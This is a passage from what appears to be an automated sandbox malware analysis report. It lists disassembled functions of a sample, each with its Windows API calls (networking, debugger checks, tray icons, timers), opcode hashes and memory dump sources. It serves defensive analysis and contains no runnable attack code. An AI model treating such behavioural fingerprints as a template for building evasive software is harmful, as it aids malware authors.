                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eaa97928bedddda42e9b7361f30a863eec4a752ed78c5bf2e16972b0e1d844a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD718BB0911A008ED7A8EFBDED697153AF4FB88344750853AE01AC72B2EBB84547CF55
                                                                                                                                                                                                                                  Function 009AFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009961A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00996299
                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 009AFD36
                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009AFD45
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009EFE33
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3500052701-0
                                                                                                                                                                                                                                  • Opcode ID: 3c1f7d76eb718c38456feb583711a8a03445d0e1e7bf925a73244abb6a4b8349
                                                                                                                                                                                                                                  • Instruction ID: 78c1b4df0ef187e24a486a71846a7d3695a6a4c736f139b42b8cb4836d161c52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c1f7d76eb718c38456feb583711a8a03445d0e1e7bf925a73244abb6a4b8349
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60319571904784AFEB33CF658865BE6BBEC9B06308F1008AED59957282D3786E85CB51
                                                                                                                                                                                                                                  Function 009C8A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,009C894C,?,00A59CE8,0000000C), ref: 009C8A84
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C894C,?,00A59CE8,0000000C), ref: 009C8A8E
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 009C8AB9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 490808831-0
                                                                                                                                                                                                                                  • Opcode ID: 03449d4bee9d9688ea22a59bb7e4d042215c4de7dc673a7868299af89d719fd3
                                                                                                                                                                                                                                  • Instruction ID: 675a196ca2ac308d767e800791ec1f9f8a6b519c2b2d1ff12709e982764225df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03449d4bee9d9688ea22a59bb7e4d042215c4de7dc673a7868299af89d719fd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40012632E055606AC624A278AC46F7F6B4D4BC5734F2A061FF8148B1D2DF759EC24193
                                                                                                                                                                                                                                  Function 009C970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,009C97BA,FF8BC369,00000000,00000002,00000000), ref: 009C9744
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C97BA,FF8BC369,00000000,00000002,00000000,?,009C5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,009B6F41), ref: 009C974E
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 009C9755
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                  • Opcode ID: 25bec7304d44559b789a22850b86270585343f611ba647979eb41b1b1fb96b62
                                                                                                                                                                                                                                  • Instruction ID: 0bf45ce8048dc995c15d1a6427afcc4f25d2bcfdacb4ba7230df3dc3dab25297
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25bec7304d44559b789a22850b86270585343f611ba647979eb41b1b1fb96b62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8014C32A20518EBCB15DF99DC09EAE3B2DEBC5330B24021DF8119B190EB70DE529B91
                                                                                                                                                                                                                                  Function 0099F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0099F27B
                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0099F289
                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0099F29F
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0099F2B1
                                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 009E32D8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3288985973-0
                                                                                                                                                                                                                                  • Opcode ID: 1de68ef111d538b54c915dfc7529a078cc8fe1450015f76fa689988070ace037
                                                                                                                                                                                                                                  • Instruction ID: bf1ca5c5110755f3962e8f33f1f5d4fc1fa75be4aa30d6ac02006c35e8b1f734
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de68ef111d538b54c915dfc7529a078cc8fe1450015f76fa689988070ace037
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF082302043849BEB70CBE8CC49FEA73ACEB84300F104929E659D30C0DB749589CB25
                                                                                                                                                                                                                                  Function 009A2B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 009A3006
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                  • String ID: CALL
                                                                                                                                                                                                                                  • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                  • Opcode ID: c027909b5cde17548e87feb4eee59f0552374b2d6725c0972e34ffc463186223
                                                                                                                                                                                                                                  • Instruction ID: fd50ec784ca86968fd7a3807a4890ee301a66b8a1299d5a14afc5f6230bdc899
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c027909b5cde17548e87feb4eee59f0552374b2d6725c0972e34ffc463186223
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B225A706082419FC714DF28C884B2ABBF5BF96314F24895DF4968B3A2D775ED81CB92
                                                                                                                                                                                                                                  Function 009A1990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 962f486d3033b06dab87e1facfc9e92b6e37111db3c5376f1bb61235084d4783
                                                                                                                                                                                                                                  • Instruction ID: 94bc35659c423b88508e33072856ea9a4c78b59f44750cd3d1bf246d4072ce96
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 962f486d3033b06dab87e1facfc9e92b6e37111db3c5376f1bb61235084d4783
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62320F30A00245EFDF24DF59D881BAEB7B9FF61360F148918E855AB2A1E735ED40CB91
                                                                                                                                                                                                                                  Function 00993A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 009D413B
                                                                                                                                                                                                                                    • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
                                                                                                                                                                                                                                    • Part of subcall function 00993A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00993A76
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                  • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                  • Opcode ID: 4e18e199453a39c196b044a7847921d0a37a815f7a58098484e1910363920f13
                                                                                                                                                                                                                                  • Instruction ID: dc1206c84ef860c562c370b9a309dc5a1ae9f3a75b2f76021d3b29728c378188
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e18e199453a39c196b044a7847921d0a37a815f7a58098484e1910363920f13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23218171A042589BDF11DF98D805BEE7BFCAF89314F00805AE545B7241DBB89A898FA1
                                                                                                                                                                                                                                  Function 009AFFE0 Relevance: 3.1, APIs: 2, Instructions: 94sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1821831730-0
                                                                                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                  • Instruction ID: 6fe08a3fb22f9ce8f0c236edd0883a95674c777432ba08e0f78fa9c6477620ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7431E870A00105DFC718EF58D694AAAF7B5FF99320B6486A5E409CB252DB36EDC1CBD0
                                                                                                                                                                                                                                  Function 00A0CDA9 Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A0DB39: _wcslen.LIBCMT ref: 00A0DB75
                                                                                                                                                                                                                                    • Part of subcall function 00A0DB39: InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A0DB7F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00A0CE10
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00A0CE24
                                                                                                                                                                                                                                    • Part of subcall function 00A0D81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D844
                                                                                                                                                                                                                                    • Part of subcall function 00A0D81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D86B
                                                                                                                                                                                                                                    • Part of subcall function 00A0CEBB: InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A0CEF5
                                                                                                                                                                                                                                    • Part of subcall function 00A0CEBB: GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A0CF08
                                                                                                                                                                                                                                    • Part of subcall function 00A0CEBB: SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A0CF1C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$ErrorEventLastOptionQuery$ConnectCrack_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3507849315-0
                                                                                                                                                                                                                                  • Opcode ID: 63166d9a731c2757db4fd59c80db6df6969941607f1923816ac8b19e8614609b
                                                                                                                                                                                                                                  • Instruction ID: edd348fa1255acaa158c06972339e9a94a3a321abd3eac05f9b3ddfea2e509ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63166d9a731c2757db4fd59c80db6df6969941607f1923816ac8b19e8614609b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F32126B290060C9BCF30AFB4E944AAF77BDAF04360B10461AE552971D2DA35D549DBA0
                                                                                                                                                                                                                                  Function 0099396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00993A3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                  • Opcode ID: 3060cb7b5c1d5023c04f44dc11d64d19ddce637ab20b76c2ceb1db945c57bf47
                                                                                                                                                                                                                                  • Instruction ID: e2cde2ba8519f123d1762b15febc5ad6bfc71123f4dbf64dcc38cc9d5a9e2810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3060cb7b5c1d5023c04f44dc11d64d19ddce637ab20b76c2ceb1db945c57bf47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6317C706057018FE720DF69D8857A7BBF8FB89318F00092EE6D987241E7B5A949CB52
                                                                                                                                                                                                                                  Function 00A0D81C Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D844
                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D86B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InternetOptionQuery
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2202126096-0
                                                                                                                                                                                                                                  • Opcode ID: 1921bfe27accfdfab47241159257ea78c2ec250a3f78e518a4231bdeb6efc12d
                                                                                                                                                                                                                                  • Instruction ID: 4f3ee1c7e378a3cb729e6ece3a885790e620119a904099b60f28da217de3fa51
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1921bfe27accfdfab47241159257ea78c2ec250a3f78e518a4231bdeb6efc12d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89016DB384021C7EDB159FA8DCC5DFB7B6CEB89790B048126FE08AA151D631DD8287A0
                                                                                                                                                                                                                                  Function 0099331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsThemeActive.UXTHEME ref: 0099333D
                                                                                                                                                                                                                                    • Part of subcall function 009932E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009932FB
                                                                                                                                                                                                                                    • Part of subcall function 009932E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00993312
                                                                                                                                                                                                                                    • Part of subcall function 0099338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00993368,?), ref: 009933BB
                                                                                                                                                                                                                                    • Part of subcall function 0099338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00993368,?), ref: 009933CE
                                                                                                                                                                                                                                    • Part of subcall function 0099338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A62418,00A62400,?,?,?,?,?,?,00993368,?), ref: 0099343A
                                                                                                                                                                                                                                    • Part of subcall function 0099338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009934BB
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00993377
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1550534281-0
                                                                                                                                                                                                                                  • Opcode ID: 2044cd394440c1a9284590529a7e92d35d186284d833b109fe5fa84f43e8a114
                                                                                                                                                                                                                                  • Instruction ID: b71d08bdd268d17c8ddaf22624e4f58a51661616c1031aa9122e23c6fc2a077b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2044cd394440c1a9284590529a7e92d35d186284d833b109fe5fa84f43e8a114
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F05471554B449FE711EFE4ED0FB6437B4A740719F008915F6059A2E2DBF941538B40
                                                                                                                                                                                                                                  Function 0099CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0099CEEE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
